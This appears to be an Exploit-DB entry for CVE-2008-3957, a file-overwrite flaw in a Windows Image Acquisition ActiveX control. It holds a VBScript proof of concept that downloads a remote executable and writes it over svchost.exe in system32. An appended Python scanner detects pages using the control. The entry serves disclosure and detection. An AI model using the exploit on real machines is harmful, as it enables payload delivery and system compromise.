- 18 Dec 2022
- EDB-ID: 32344
- EDB verification: Passed
- Author: CIPH3R
- Vulnerability type: REMOTE
- Platform: WINDOWS
- CVE: CVE-2008-3957
- Publication date: 2008-09-08
Code:
source: https://www.securityfocus.com/bid/31069/info
Microsoft Windows Image Acquisition Logger ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
An attacker can exploit this issue to overwrite files with attacker-supplied data, which will aid in further attacks.
<object classid="clsid:A1E75357-881A-419E-83E2-BB16DB197C68" id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
dim remURL
remURL = "http://victim.com/svchost.exe"
test.Open remURL, True
test.Save "C:\WINDOWS\system32\svchost.exe", True
End Sub
</script>
- Source: www.exploit-db.com
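
A defender-side check for web content that instantiates this control, added here as an example and not part of the original Exploit-DB entry: it parses a page, finds `<object>` tags carrying the CLSID from the PoC above, and reports `Open`/`Save` calls made on them. The function name, result keys and both sample pages are assumptions made for the illustration.

```python
import re
from html.parser import HTMLParser

# CLSID from the <object> tag in the PoC on this page.
WIA_LOGGER_CLSID = "a1e75357-881a-419e-83e2-bb16db197c68"

class _Scanner(HTMLParser):
    """Records <object> tags that load the control, plus all script bodies."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "object":
            # Match "clsid:GUID" in any letter case, with or without braces.
            classid = re.sub(r"[{}\s]", "", attrs.get("classid") or "").lower()
            if classid == "clsid:" + WIA_LOGGER_CLSID:
                self.object_ids.append(attrs.get("id") or attrs.get("name") or "")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan_page(html):
    """Return whether the page loads the control and which methods it calls on it."""
    s = _Scanner()
    s.feed(html)
    s.close()
    calls = set()
    for obj_id in filter(None, s.object_ids):
        # VBScript is case-insensitive, so match test.Save, TEST.save, ...
        pat = re.compile(r"\b%s\s*\.\s*(open|save)\b" % re.escape(obj_id), re.I)
        for body in s.scripts:
            calls.update(m.group(1).lower() for m in pat.finditer(body))
    return {"loads_control": bool(s.object_ids), "calls": sorted(calls),
            "writes_file": "save" in calls}

# Constructed sample pages (placeholder URL and path), not captured traffic.
SAMPLE_HIT = r"""<object classid="CLSID:{A1E75357-881A-419E-83E2-BB16DB197C68}" id="ctl"></object>
<script language="vbscript">
ctl.Open "http://example.invalid/a.bin", True
ctl.Save "C:\placeholder\out.bin", True
</script>"""
SAMPLE_CLEAN = '<object classid="clsid:00000000-0000-0000-0000-000000000000" id="x"></object>'
```

The check only sees static markup; a page that builds the `<object>` tag at runtime would need the rendered DOM or proxy-level inspection instead.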